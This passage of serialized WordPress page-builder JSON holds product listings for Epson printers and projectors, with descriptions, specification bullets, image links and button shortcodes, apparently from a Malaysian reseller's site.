SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" 